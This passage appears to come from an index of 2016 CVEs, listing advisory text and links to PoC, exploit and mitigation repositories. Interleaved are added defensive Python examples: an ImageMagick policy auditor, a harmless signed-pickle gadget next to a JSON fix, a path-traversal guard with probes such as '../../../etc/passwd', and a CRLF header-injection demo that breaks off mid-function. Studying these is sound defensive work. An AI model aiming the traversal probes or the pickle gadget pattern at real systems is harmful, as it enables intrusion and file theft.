buffer.c in named in ISC BIND 9 before 9.9.9-P3, 9.10.x before 9.10.4-P3, and 9.11.x before 9.11.0rc3 does not properly construct responses, which allows remote attackers to cause a denial of service (assertion failure and daemon exit) via a crafted query.

- [KosukeShimofuji/CVE-2016-2776](https://github.com/KosukeShimofuji/CVE-2016-2776)
- [infobyte/CVE-2016-2776](https://github.com/infobyte/CVE-2016-2776)

### CVE-2016-2783 (2017-01-23)

Avaya Fabric Connect Virtual Services Platform (VSP) Operating System Software (VOSS) before 4.2.3.0 and 5.x before 5.0.1.0 does not properly handle VLAN and I-SIS indexes, which allows remote attackers to obtain unauthorized access via crafted Ethernet frames.

- [iknowjason/spb](https://github.com/iknowjason/spb)

### CVE-2016-3088 (2016-06-01)

The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request.

- [Ma1Dong/ActiveMQ_putshell-CVE-2016-3088](https://github.com/Ma1Dong/ActiveMQ_putshell-CVE-2016-3088)
- [pudiding/CVE-2016-3088](https://github.com/pudiding/CVE-2016-3088)
- [cyberaguiar/CVE-2016-3088](https://github.com/cyberaguiar/CVE-2016-3088)
- [vonderchild/CVE-2016-3088](https://github.com/vonderchild/CVE-2016-3088)
- [cl4ym0re/CVE-2016-3088](https://github.com/cl4ym0re/CVE-2016-3088)
- [YutuSec/ActiveMQ_Crack](https://github.com/YutuSec/ActiveMQ_Crack)

### CVE-2016-3113 (2017-08-07)

Cross-site scripting (XSS) vulnerability in ovirt-engine allows remote attackers to inject arbitrary web script or HTML.

- [0xEmanuel/CVE-2016-3113](https://github.com/0xEmanuel/CVE-2016-3113)

### CVE-2016-3116 (2016-03-22)

CRLF injection vulnerability in Dropbear SSH before 2016.72 allows remote authenticated users to bypass intended shell-command restrictions via crafted X11 forwarding data.

- [mxypoo/CVE-2016-3116-DropbearSSH](https://github.com/mxypoo/CVE-2016-3116-DropbearSSH)

### CVE-2016-3141 (2016-03-31)

Use-after-free vulnerability in wddx.c in the WDDX extension in PHP before 5.5.33 and 5.6.x before 5.6.19 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact by triggering a wddx_deserialize call on XML data containing a crafted var element.

- [peternguyen93/CVE-2016-3141](https://github.com/peternguyen93/CVE-2016-3141)

### CVE-2016-3238 (2016-07-13)

The Print Spooler service in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, and Windows 10 Gold and 1511 allows man-in-the-middle attackers to execute arbitrary code by providing a crafted print driver during printer installation, aka "Windows Print Spooler Remote Code Execution Vulnerability."

- [pyiesone/CVE-2016-3238-PoC](https://github.com/pyiesone/CVE-2016-3238-PoC)

### CVE-2016-3308 (2016-08-09)

The kernel-mode drivers in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607 allow local users to gain privileges via a crafted application, aka "Win32k Elevation of Privilege Vulnerability," a different vulnerability than CVE-2016-3309, CVE-2016-3310, and CVE-2016-3311.

- [55-AA/CVE-2016-3308](https://github.com/55-AA/CVE-2016-3308)

### CVE-2016-3309 (2016-08-09)

The kernel-mode drivers in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607 allow local users to gain privileges via a crafted application, aka "Win32k Elevation of Privilege Vulnerability," a different vulnerability than CVE-2016-3308, CVE-2016-3310, and CVE-2016-3311.

- [siberas/CVE-2016-3309_Reloaded](https://github.com/siberas/CVE-2016-3309_Reloaded)

### CVE-2016-3510 (2016-07-21)

Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to WLS Core Components, a different vulnerability than CVE-2016-3586.

- [BabyTeam1024/CVE-2016-3510](https://github.com/BabyTeam1024/CVE-2016-3510)

### CVE-2016-3714 (2016-05-05)

The (1) EPHEMERAL, (2) HTTPS, (3) MVG, (4) MSL, (5) TEXT, (6) SHOW, (7) WIN, and (8) PLT coders in ImageMagick before 6.9.3-10 and 7.x before 7.0.1-1 allow remote attackers to execute arbitrary code via shell metacharacters in a crafted image, aka "ImageTragick."

- [jackdpeterson/imagick_secure_puppet](https://github.com/jackdpeterson/imagick_secure_puppet)
- [tommiionfire/CVE-2016-3714](https://github.com/tommiionfire/CVE-2016-3714)
- [chusiang/CVE-2016-3714.ansible.role](https://github.com/chusiang/CVE-2016-3714.ansible.role)
- [jpeanut/ImageTragick-CVE-2016-3714-RShell](https://github.com/jpeanut/ImageTragick-CVE-2016-3714-RShell)
- [Hood3dRob1n/CVE-2016-3714](https://github.com/Hood3dRob1n/CVE-2016-3714)
- [JoshMorrison99/CVE-2016-3714](https://github.com/JoshMorrison99/CVE-2016-3714)
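
Several of the repositories above are deployment tooling rather than exploits, because the standard mitigation for unpatched hosts is a policy.xml that disables the eight coders named in the CVE text with `domain="coder" rights="none"` entries. The example below is added here and is not ImageMagick's or any of those projects' code: it parses a policy.xml, reports which of the eight coders are still enabled, and shows a weak policy (resource limits only) beside a hardened one. Both policies are constructed for the demo, and the glob matching uses fnmatch as an approximation of ImageMagick's pattern matching, which is an assumption of this example.

```python
"""Added example: audit an ImageMagick policy.xml for the ImageTragick coders."""
import fnmatch
import sys
import xml.etree.ElementTree as ET

# The coders named in the CVE text; each needs a rights="none" coder policy.
IMAGETRAGICK_CODERS = ("EPHEMERAL", "HTTPS", "MVG", "MSL", "TEXT", "SHOW", "WIN", "PLT")

def denied_coders(policy_xml, coders=IMAGETRAGICK_CODERS):
    """Coders from `coders` covered by at least one domain="coder" rights="none"
    policy.  Patterns are matched case-insensitively with fnmatch (assumption)."""
    root = ET.fromstring(policy_xml)
    denied = set()
    for pol in root.iter("policy"):
        if pol.get("domain") != "coder":
            continue
        rights = (pol.get("rights") or "").strip().lower()
        pattern = (pol.get("pattern") or "").strip().upper()
        if rights == "none" and pattern:
            denied.update(c for c in coders if fnmatch.fnmatchcase(c, pattern))
    return denied

def missing_coders(policy_xml, coders=IMAGETRAGICK_CODERS):
    """Coders still usable under this policy; empty means the mitigation is in place."""
    return [c for c in coders if c not in denied_coders(policy_xml, coders)]

# Constructed policies, not copied from any distribution's shipped policy.xml.
WEAK_POLICY = """<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="resource" name="disk" value="1GiB"/>
</policymap>"""

HARDENED_POLICY = """<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="coder" rights="none" pattern="EPHEMERAL"/>
  <policy domain="coder" rights="none" pattern="HTTPS"/>
  <policy domain="coder" rights="none" pattern="MVG"/>
  <policy domain="coder" rights="none" pattern="MSL"/>
  <policy domain="coder" rights="none" pattern="TEXT"/>
  <policy domain="coder" rights="none" pattern="SHOW"/>
  <policy domain="coder" rights="none" pattern="WIN"/>
  <policy domain="coder" rights="none" pattern="PLT"/>
</policymap>"""

def audit_file(path):
    """Read a policy.xml from disk (DOCTYPE declarations are accepted) and
    return the coders it leaves enabled."""
    with open(path, "rb") as fh:
        return missing_coders(fh.read())

if __name__ == "__main__":
    if len(sys.argv) > 1:
        print("still enabled:", audit_file(sys.argv[1]))
    else:
        print("weak policy leaves enabled:", missing_coders(WEAK_POLICY))
        print("hardened policy leaves enabled:", missing_coders(HARDENED_POLICY))
```

Run it against the policy.xml ImageMagick actually loads (`convert -list policy` prints the path and the effective rules) rather than a copy in a config repository, since a policy file in the wrong directory is silently ignored. A `rights="read"` entry for a coder does not count as disabling it: reading a crafted MVG or MSL file is exactly the exploit path.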

### CVE-2016-3749 (2016-07-11)

server/LockSettingsService.java in LockSettingsService in Android 6.x before 2016-07-01 allows attackers to modify the screen-lock password or pattern via a crafted application, aka internal bug 28163930.

- [nirdev/CVE-2016-3749-PoC](https://github.com/nirdev/CVE-2016-3749-PoC)

### CVE-2016-3861 (2016-09-11)

LibUtils in Android 4.x before 4.4.4, 5.0.x before 5.0.2, 5.1.x before 5.1.1, 6.x before 2016-09-01, and 7.0 before 2016-09-01 mishandles conversions between Unicode character encodings with different encoding widths, which allows remote attackers to execute arbitrary code or cause a denial of service (heap-based buffer overflow) via a crafted file, aka internal bug 29250543.

- [zxkevn/CVE-2016-3861](https://github.com/zxkevn/CVE-2016-3861)

### CVE-2016-3955 (2016-07-03)

The usbip_recv_xbuff function in drivers/usb/usbip/usbip_common.c in the Linux kernel before 4.5.3 allows remote attackers to cause a denial of service (out-of-bounds write) or possibly have unspecified other impact via a crafted length value in a USB/IP packet.

- [pqsec/uboatdemo](https://github.com/pqsec/uboatdemo)

### CVE-2016-3957 (2018-02-06)

The secure_load function in gluon/utils.py in web2py before 2.14.2 uses pickle.loads to deserialize session information stored in cookies, which might allow remote attackers to execute arbitrary code by leveraging knowledge of encryption_key.

- [sj/web2py-e94946d-CVE-2016-3957](https://github.com/sj/web2py-e94946d-CVE-2016-3957)
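The problem is the order of operations: the HMAC only proves the cookie was produced by someone holding `encryption_key`, and `pickle.loads` then executes whatever that someone put in it. The added example below is not web2py code; it reproduces the vulnerable shape with a constructed key and cookie layout, shows why a signed pickle is still code execution, and gives the data-only replacement (JSON under the same HMAC).

```python
"""Added example (not web2py code): the pattern behind CVE-2016-3957 and a safe
replacement. Key and cookie layout are constructed for the demo."""
import base64
import hashlib
import hmac
import json
import pickle

DEMO_KEY = b"constructed-demo-key"   # stands in for encryption_key (assumption)


def _sign(payload: bytes, key: bytes) -> bytes:
    return hmac.new(key, payload, hashlib.sha256).hexdigest().encode()


def _verify_and_unwrap(cookie: bytes, key: bytes) -> bytes:
    """Check the HMAC over the base64 payload and return the decoded bytes."""
    sig, sep, payload = cookie.partition(b":")
    if not sep or not hmac.compare_digest(sig, _sign(payload, key)):
        raise ValueError("bad signature")
    return base64.b64decode(payload)


def load_session_pickle(cookie: bytes, key: bytes):
    """Vulnerable: the signature is fine, but pickle.loads runs attacker-chosen callables."""
    return pickle.loads(_verify_and_unwrap(cookie, key))


class Gadget:
    """Constructed: pickle stores __reduce__'s (callable, args) and loads() calls it.
    str.upper keeps the demo harmless; any importable callable would do."""
    def __reduce__(self):
        return (str.upper, ("code ran during deserialisation",))


def forge_pickle_cookie(key: bytes) -> bytes:
    """What a holder of the key can mint: a correctly signed malicious pickle."""
    payload = base64.b64encode(pickle.dumps(Gadget()))
    return _sign(payload, key) + b":" + payload


def dump_session_json(session: dict, key: bytes) -> bytes:
    payload = base64.b64encode(json.dumps(session).encode())
    return _sign(payload, key) + b":" + payload


def load_session_json(cookie: bytes, key: bytes) -> dict:
    """Hardened: same HMAC, but the payload is data only, so there is no code path."""
    obj = json.loads(_verify_and_unwrap(cookie, key).decode("utf-8"))
    if not isinstance(obj, dict):
        raise ValueError("session must be a JSON object")
    return obj


if __name__ == "__main__":
    print(load_session_pickle(forge_pickle_cookie(DEMO_KEY), DEMO_KEY))
    print(load_session_json(dump_session_json({"user": "alice"}, DEMO_KEY), DEMO_KEY))
```

Rotating a default or leaked key closes the forgery path, but only switching the serialiser removes the class of bug: a signed pickle from a key that leaks next year is the same RCE.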

### CVE-2016-3959 (2016-05-23)

The Verify function in crypto/dsa/dsa.go in Go before 1.5.4 and 1.6.x before 1.6.1 does not properly check parameters passed to the big integer library, which might allow remote attackers to cause a denial of service (infinite loop) via a crafted public key to a program that uses HTTPS client certificates or SSH server libraries.

- [alexmullins/dsa](https://github.com/alexmullins/dsa)

### CVE-2016-3962 (2016-07-03)

Stack-based buffer overflow in the NTP time-server interface on Meinberg IMS-LANTIME M3000, IMS-LANTIME M1000, IMS-LANTIME M500, LANTIME M900, LANTIME M600, LANTIME M400, LANTIME M300, LANTIME M200, LANTIME M100, SyncFire 1100, and LCES devices with firmware before 6.20.004 allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via a crafted parameter in a POST request.

- [securifera/CVE-2016-3962-Exploit](https://github.com/securifera/CVE-2016-3962-Exploit)

### CVE-2016-4004 (2016-04-12)

Directory traversal vulnerability in Dell OpenManage Server Administrator (OMSA) 8.2 allows remote authenticated administrators to read arbitrary files via a ..\ (dot dot backslash) in the file parameter to ViewFile.

- [und3sc0n0c1d0/AFR-in-OMSA](https://github.com/und3sc0n0c1d0/AFR-in-OMSA)

### CVE-2016-4010 (2017-01-23)

Magento CE and EE before 2.0.6 allows remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via crafted serialized shopping cart data.

- [brianwrf/Magento-CVE-2016-4010](https://github.com/brianwrf/Magento-CVE-2016-4010)
- [shadofren/CVE-2016-4010](https://github.com/shadofren/CVE-2016-4010)

### CVE-2016-4014 (2016-04-14)

XML external entity (XXE) vulnerability in the UDDI component in SAP NetWeaver JAVA AS 7.4 allows remote attackers to cause a denial of service (system hang) via a crafted DTD in an XML request to uddi/api/replication, aka SAP Security Note 2254389.

- [murataydemir/CVE-2016-4014](https://github.com/murataydemir/CVE-2016-4014)

### CVE-2016-4117 (2016-05-11)

Adobe Flash Player 21.0.0.226 and earlier allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in May 2016.

- [amit-raut/CVE-2016-4117-Report](https://github.com/amit-raut/CVE-2016-4117-Report)
- [hybridious/CVE-2016-4117](https://github.com/hybridious/CVE-2016-4117)

### CVE-2016-4437 (2016-06-07)

Apache Shiro before 1.2.5, when a cipher key has not been configured for the "remember me" feature, allows remote attackers to execute arbitrary code or bypass intended access restrictions via an unspecified request parameter.

- [bkfish/Awesome_shiro](https://github.com/bkfish/Awesome_shiro)
- [m3terpreter/CVE-2016-4437](https://github.com/m3terpreter/CVE-2016-4437)
- [4nth0ny1130/shisoserial](https://github.com/4nth0ny1130/shisoserial)
- [pizza-power/CVE-2016-4437](https://github.com/pizza-power/CVE-2016-4437)
- [xk-mt/CVE-2016-4437](https://github.com/xk-mt/CVE-2016-4437)

### CVE-2016-4438 (2016-07-04)

The REST plugin in Apache Struts 2 2.3.19 through 2.3.28.1 allows remote attackers to execute arbitrary code via a crafted expression.

- [jason3e7/CVE-2016-4438](https://github.com/jason3e7/CVE-2016-4438)
- [tafamace/CVE-2016-4438](https://github.com/tafamace/CVE-2016-4438)

### CVE-2016-4463 (2016-07-08)

Stack-based buffer overflow in Apache Xerces-C++ before 3.1.4 allows context-dependent attackers to cause a denial of service via a deeply nested DTD.

- [arntsonl/CVE-2016-4463](https://github.com/arntsonl/CVE-2016-4463)

### CVE-2016-4468 (2017-04-11)

SQL injection vulnerability in Pivotal Cloud Foundry (PCF) before 238; UAA 2.x before 2.7.4.4, 3.x before 3.3.0.2, and 3.4.x before 3.4.1; UAA BOSH before 11.2 and 12.x before 12.2; Elastic Runtime before 1.6.29 and 1.7.x before 1.7.7; and Ops Manager 1.7.x before 1.7.8 allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors.

- [shanika04/cloudfoundry_uaa](https://github.com/shanika04/cloudfoundry_uaa)

### CVE-2016-4622 (2016-07-22)

WebKit in Apple iOS before 9.3.3, Safari before 9.1.2, and tvOS before 9.2.2 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, a different vulnerability than CVE-2016-4589, CVE-2016-4623, and CVE-2016-4624.

- [saelo/jscpwn](https://github.com/saelo/jscpwn)
- [hdbreaker/WebKit-CVE-2016-4622](https://github.com/hdbreaker/WebKit-CVE-2016-4622)

### CVE-2016-4631 (2016-07-22)

ImageIO in Apple iOS before 9.3.3, OS X before 10.11.6, tvOS before 9.2.2, and watchOS before 2.2.2 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted TIFF file.

- [hansnielsen/tiffdisabler](https://github.com/hansnielsen/tiffdisabler)

### CVE-2016-4655 (2016-08-25)

The kernel in Apple iOS before 9.3.5 allows attackers to obtain sensitive information from memory via a crafted app.

- [jndok/PegasusX](https://github.com/jndok/PegasusX)
- [Cryptiiiic/skybreak](https://github.com/Cryptiiiic/skybreak)
- [liangle1986126z/jndok](https://github.com/liangle1986126z/jndok)

### CVE-2016-4657 (2016-08-25)

WebKit in Apple iOS before 9.3.5 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.

- [Mimoja/CVE-2016-4657-NintendoSwitch](https://github.com/Mimoja/CVE-2016-4657-NintendoSwitch)
- [iDaN5x/Switcheroo](https://github.com/iDaN5x/Switcheroo)
- [viai957/webkit-vulnerability](https://github.com/viai957/webkit-vulnerability)

### CVE-2016-4669 (2017-02-20)

An issue was discovered in certain Apple products. iOS before 10.1 is affected. macOS before 10.12.1 is affected. tvOS before 10.0.1 is affected. watchOS before 3.1 is affected. The issue involves the "Kernel" component. It allows local users to execute arbitrary code in a privileged context or cause a denial of service (MIG code mishandling and system crash) via unspecified vectors.

- [i-o-s/CVE-2016-4669](https://github.com/i-o-s/CVE-2016-4669)

### CVE-2016-4845 (2016-09-24)

Cross-site request forgery (CSRF) vulnerability on I-O DATA DEVICE HVL-A2.0, HVL-A3.0, HVL-A4.0, HVL-AT1.0S, HVL-AT2.0, HVL-AT3.0, HVL-AT4.0, HVL-AT2.0A, HVL-AT3.0A, and HVL-AT4.0A devices with firmware before 2.04 allows remote attackers to hijack the authentication of arbitrary users for requests that delete content.

- [kaito834/cve-2016-4845_csrf](https://github.com/kaito834/cve-2016-4845_csrf)

### CVE-2016-4861 (2017-02-16)

The (1) order and (2) group methods in Zend_Db_Select in the Zend Framework before 1.12.20 might allow remote attackers to conduct SQL injection attacks by leveraging failure to remove comments from an SQL statement before validation.

- [KosukeShimofuji/CVE-2016-4861](https://github.com/KosukeShimofuji/CVE-2016-4861)

### CVE-2016-4971 (2016-06-30)

GNU wget before 1.18 allows remote servers to write to arbitrary files by redirecting a request from HTTP to a crafted FTP resource.

- [gitcollect/CVE-2016-4971](https://github.com/gitcollect/CVE-2016-4971)
- [mbadanoiu/CVE-2016-4971](https://github.com/mbadanoiu/CVE-2016-4971)
- [dinidhu96/IT19013756_-CVE-2016-4971-](https://github.com/dinidhu96/IT19013756_-CVE-2016-4971-)

### CVE-2016-4977 (2017-05-25)

When processing authorization requests using the whitelabel views in Spring Security OAuth 2.0.0 to 2.0.9 and 1.0.0 to 1.0.5, the response_type parameter value was executed as Spring SpEL which enabled a malicious user to trigger remote code execution via the crafting of the value for response_type.

- [N0b1e6/CVE-2016-4977-POC](https://github.com/N0b1e6/CVE-2016-4977-POC)
- [tpt11fb/SpringVulScan](https://github.com/tpt11fb/SpringVulScan)

### CVE-2016-4999 (2016-08-05)

SQL injection vulnerability in the getStringParameterSQL method in main/java/org/dashbuilder/dataprovider/sql/dialect/DefaultDialect.java in Dashbuilder before 0.6.0.Beta1 allows remote attackers to execute arbitrary SQL commands via a data set lookup filter in the (1) Data Set Authoring or (2) Displayer editor UI.

- [shanika04/dashbuilder](https://github.com/shanika04/dashbuilder)

### CVE-2016-5195 (2016-11-10)

Race condition in mm/gup.c in the Linux kernel 2.x through 4.x before 4.8.3 allows local users to gain privileges by leveraging incorrect handling of a copy-on-write (COW) feature to write to a read-only memory mapping, as exploited in the wild in October 2016, aka "Dirty COW."

- [KosukeShimofuji/CVE-2016-5195](https://github.com/KosukeShimofuji/CVE-2016-5195)
- [ASRTeam/CVE-2016-5195](https://github.com/ASRTeam/CVE-2016-5195)
- [timwr/CVE-2016-5195](https://github.com/timwr/CVE-2016-5195)
- [xlucas/dirtycow.cr](https://github.com/xlucas/dirtycow.cr)
- [istenrot/centos-dirty-cow-ansible](https://github.com/istenrot/centos-dirty-cow-ansible)
- [pgporada/ansible-role-cve](https://github.com/pgporada/ansible-role-cve)
- [sideeffect42/DirtyCOWTester](https://github.com/sideeffect42/DirtyCOWTester)
- [scumjr/dirtycow-vdso](https://github.com/scumjr/dirtycow-vdso)
- [gbonacini/CVE-2016-5195](https://github.com/gbonacini/CVE-2016-5195)
- [DavidBuchanan314/cowroot](https://github.com/DavidBuchanan314/cowroot)
- [aishee/scan-dirtycow](https://github.com/aishee/scan-dirtycow)
- [oleg-fiksel/ansible_CVE-2016-5195_check](https://github.com/oleg-fiksel/ansible_CVE-2016-5195_check)
- [ldenevi/CVE-2016-5195](https://github.com/ldenevi/CVE-2016-5195)
- [whu-enjoy/CVE-2016-5195](https://github.com/whu-enjoy/CVE-2016-5195)
- [firefart/dirtycow](https://github.com/firefart/dirtycow)
- [ndobson/inspec_CVE-2016-5195](https://github.com/ndobson/inspec_CVE-2016-5195)
- [sribaba/android-CVE-2016-5195](https://github.com/sribaba/android-CVE-2016-5195)
- [esc0rtd3w/org.cowpoop.moooooo](https://github.com/esc0rtd3w/org.cowpoop.moooooo)
- [hyln9/VIKIROOT](https://github.com/hyln9/VIKIROOT)
- [droidvoider/dirtycow-replacer](https://github.com/droidvoider/dirtycow-replacer)
- [FloridSleeves/os-experiment-4](https://github.com/FloridSleeves/os-experiment-4)
- [arbll/dirtycow](https://github.com/arbll/dirtycow)
- [titanhp/Dirty-COW-CVE-2016-5195-Testing](https://github.com/titanhp/Dirty-COW-CVE-2016-5195-Testing)
- [acidburnmi/CVE-2016-5195-master](https://github.com/acidburnmi/CVE-2016-5195-master)
- [xpcmdshell/derpyc0w](https://github.com/xpcmdshell/derpyc0w)
- [Brucetg/DirtyCow-EXP](https://github.com/Brucetg/DirtyCow-EXP)
- [jas502n/CVE-2016-5195](https://github.com/jas502n/CVE-2016-5195)
- [imust6226/dirtcow](https://github.com/imust6226/dirtcow)
- [zakariamaaraki/Dirty-COW-CVE-2016-5195-](https://github.com/zakariamaaraki/Dirty-COW-CVE-2016-5195-)
- [shanuka-ashen/Dirty-Cow-Explanation-CVE-2016-5195-](https://github.com/shanuka-ashen/Dirty-Cow-Explanation-CVE-2016-5195-)
- [dulanjaya23/Dirty-Cow-CVE-2016-5195-](https://github.com/dulanjaya23/Dirty-Cow-CVE-2016-5195-)
- [KaviDk/dirtyCow](https://github.com/KaviDk/dirtyCow)
- [DanielEbert/CVE-2016-5195](https://github.com/DanielEbert/CVE-2016-5195)
- [arttnba3/CVE-2016-5195](https://github.com/arttnba3/CVE-2016-5195)
- [talsim/root-dirtyc0w](https://github.com/talsim/root-dirtyc0w)
- [KasunPriyashan/Y2S1-Project-Linux-Exploitaion-using-CVE-2016-5195-Vulnerability](https://github.com/KasunPriyashan/Y2S1-Project-Linux-Exploitaion-using-CVE-2016-5195-Vulnerability)
- [th3-5had0w/DirtyCOW-PoC](https://github.com/th3-5had0w/DirtyCOW-PoC)
- [r1is/CVE-2022-0847](https://github.com/r1is/CVE-2022-0847)
- [vinspiert/scumjrs](https://github.com/vinspiert/scumjrs)
- [gurpreetsinghsaluja/dirtycow](https://github.com/gurpreetsinghsaluja/dirtycow)
- [TotallyNotAHaxxer/CVE-2016-5195](https://github.com/TotallyNotAHaxxer/CVE-2016-5195)
- [passionchenjianyegmail8/scumjrs](https://github.com/passionchenjianyegmail8/scumjrs)
- [malinthag62/The-exploitation-of-Dirty-Cow-CVE-2016-5195](https://github.com/malinthag62/The-exploitation-of-Dirty-Cow-CVE-2016-5195)
- [1equeneRise/scumjr9](https://github.com/1equeneRise/scumjr9)
- [fei9747/CVE-2016-5195](https://github.com/fei9747/CVE-2016-5195)
- [LinuxKernelContent/DirtyCow](https://github.com/LinuxKernelContent/DirtyCow)
- [NguyenCongHaiNam/Research-CVE-2016-5195](https://github.com/NguyenCongHaiNam/Research-CVE-2016-5195)
- [EDLLT/CVE-2016-5195-master](https://github.com/EDLLT/CVE-2016-5195-master)
- [ZhiQiAnSecFork/DirtyCOW_CVE-2016-5195](https://github.com/ZhiQiAnSecFork/DirtyCOW_CVE-2016-5195)
- [sakilahamed/Linux-Kernel-Exploit-LAB](https://github.com/sakilahamed/Linux-Kernel-Exploit-LAB)
- [ASUKA39/CVE-2016-5195](https://github.com/ASUKA39/CVE-2016-5195)

### CVE-2016-5345 (2018-01-23)

Buffer overflow in the Qualcomm radio driver in Android before 2017-01-05 on Android One devices allows local users to gain privileges via a crafted application, aka Android internal bug 32639452 and Qualcomm internal bug CR1079713.

- [NickStephens/cve-2016-5345](https://github.com/NickStephens/cve-2016-5345)

### CVE-2016-5394 (2017-07-19)

In the XSS Protection API module before 1.0.12 in Apache Sling, the encoding done by the XSSAPI.encodeForJSString() method is not restrictive enough and for some input patterns allows script tags to pass through unencoded, leading to potential XSS vulnerabilities.

- [epicosy/VUL4J-23](https://github.com/epicosy/VUL4J-23)

### CVE-2016-5636 (2016-09-02)

Integer overflow in the get_data function in zipimport.c in CPython (aka Python) before 2.7.12, 3.x before 3.4.5, and 3.5.x before 3.5.2 allows remote attackers to have unspecified impact via a negative data size value, which triggers a heap-based buffer overflow.

- [insuyun/CVE-2016-5636](https://github.com/insuyun/CVE-2016-5636)

### CVE-2016-5639 (2016-08-03)

Directory traversal vulnerability in cgi-bin/login.cgi on Crestron AirMedia AM-100 devices with firmware before 1.4.0.13 allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter.

- [xfox64x/CVE-2016-5639](https://github.com/xfox64x/CVE-2016-5639)

### CVE-2016-5640 (2016-08-03)

Directory traversal vulnerability in cgi-bin/rftest.cgi on Crestron AirMedia AM-100 devices with firmware before 1.4.0.13 allows remote attackers to execute arbitrary commands via a .. (dot dot) in the ATE_COMMAND parameter.

- [vpnguy-zz/CrestCrack](https://github.com/vpnguy-zz/CrestCrack)
- [xfox64x/CVE-2016-5640](https://github.com/xfox64x/CVE-2016-5640)
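The OMSA bug (CVE-2016-4004) traverses with `..\`, the AirMedia bugs with `..`, and both hand the result to a file or command path. The added example below is not code from any listed repository; it is the server-side mapping a `file`/`src` parameter should go through: undo percent-encoding (twice, to catch double encoding), normalise both separators, reject any parent reference outright instead of silently collapsing it, and confirm the final path still lives under the root. The root directory and probe strings are constructed for the demo.

```python
"""Added example: mapping a user-supplied file name under a fixed directory without
letting it escape. Not code from the OMSA or AirMedia PoCs."""
import posixpath
import re
import urllib.parse

DRIVE_OR_UNC = re.compile(r"^([A-Za-z]:|//)")


def safe_join(root: str, requested: str) -> str:
    """Return the absolute path under `root` for `requested`, or raise PermissionError."""
    root = posixpath.normpath(root)
    decoded = requested
    for _ in range(2):                    # %2e%2e and %252e%252e both end up as '..'
        decoded = urllib.parse.unquote(decoded)
    decoded = decoded.replace("\\", "/")  # '..\\' (Windows, as in OMSA) becomes '../'
    if "\x00" in decoded or DRIVE_OR_UNC.match(decoded):
        raise PermissionError(f"rejected path {requested!r}")
    parts = [p for p in decoded.split("/") if p not in ("", ".")]
    if ".." in parts:
        raise PermissionError(f"parent reference in {requested!r}")
    candidate = posixpath.normpath(posixpath.join(root, *parts)) if parts else root
    # Belt and braces: whatever the component filter missed must still be under root.
    if candidate != root and not candidate.startswith(root + "/"):
        raise PermissionError(f"{requested!r} resolves outside {root}")
    return candidate


def is_traversal(root: str, requested: str) -> bool:
    """True if safe_join would refuse the request."""
    try:
        safe_join(root, requested)
    except PermissionError:
        return True
    return False


# Constructed probes of the shapes the two advisories describe, with expected verdicts.
PROBES = {
    "reports/q1.log": False,
    "./logs/today.log": False,
    "..\\..\\windows\\win.ini": True,
    "../../../etc/passwd": True,
    "%2e%2e/%2e%2e/etc/passwd": True,
    "%252e%252e%252f%252e%252e%252fetc%252fpasswd": True,
    "logs/../../etc/passwd": True,
}

if __name__ == "__main__":
    for probe, expected in PROBES.items():
        print(f"{probe!r:50} traversal={is_traversal('/srv/files', probe)} expected={expected}")
```

A leading `/` in the request is treated as relative to the root rather than rejected; change that if the parameter is never meant to start with a separator. Symlinks inside the root are a separate problem and need `os.path.realpath` on the final candidate.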

### CVE-2016-5696 (2016-08-06)

net/ipv4/tcp_input.c in the Linux kernel before 4.7 does not properly determine the rate of challenge ACK segments, which makes it easier for remote attackers to hijack TCP sessions via a blind in-window attack.

- [Gnoxter/mountain_goat](https://github.com/Gnoxter/mountain_goat)
- [violentshell/rover](https://github.com/violentshell/rover)
- [jduck/challack](https://github.com/jduck/challack)
- [bplinux/chackd](https://github.com/bplinux/chackd)
- [unkaktus/grill](https://github.com/unkaktus/grill)

### CVE-2016-5699 (2016-09-02)

CRLF injection vulnerability in the HTTPConnection.putheader function in urllib2 and urllib in CPython (aka Python) before 2.7.10 and 3.x before 3.4.4 allows remote attackers to inject arbitrary HTTP headers via CRLF sequences in a URL.

- [bunseokbot/CVE-2016-5699-poc](https://github.com/bunseokbot/CVE-2016-5699-poc)
- [shajinzheng/cve-2016-5699-jinzheng-sha](https://github.com/shajinzheng/cve-2016-5699-jinzheng-sha)
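`putheader` wrote the value it was given verbatim, so a CR/LF that reached it (for example from a URL whose `%0d%0a` was decoded upstream) ended the header line and started a new one of the attacker's choosing. The added example below is not from the listed PoCs: it reproduces the unpatched shape on raw bytes so the split is visible, shows the validation a client must apply, and probes the running interpreter to confirm that `http.client` now refuses such values. The header names and injected value are constructed.

```python
"""Added example: CRLF header injection of the CVE-2016-5699 shape, the check that
prevents it, and a probe of the stdlib fix. Not code from the listed repositories."""
import http.client
import re

CRLF = re.compile(r"[\r\n]")


def build_request_unchecked(host: str, path: str, headers: dict) -> bytes:
    """Pre-fix shape: every value is written verbatim, so a CRLF inside a value (or
    inside the request target) terminates the line and begins a new header."""
    lines = [f"GET {path} HTTP/1.1", f"Host: {host}"]
    lines += [f"{name}: {value}" for name, value in headers.items()]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1")


def header_names(raw: bytes) -> list:
    """Header names as a receiving server would parse them from the wire bytes."""
    head = raw.split(b"\r\n\r\n", 1)[0]
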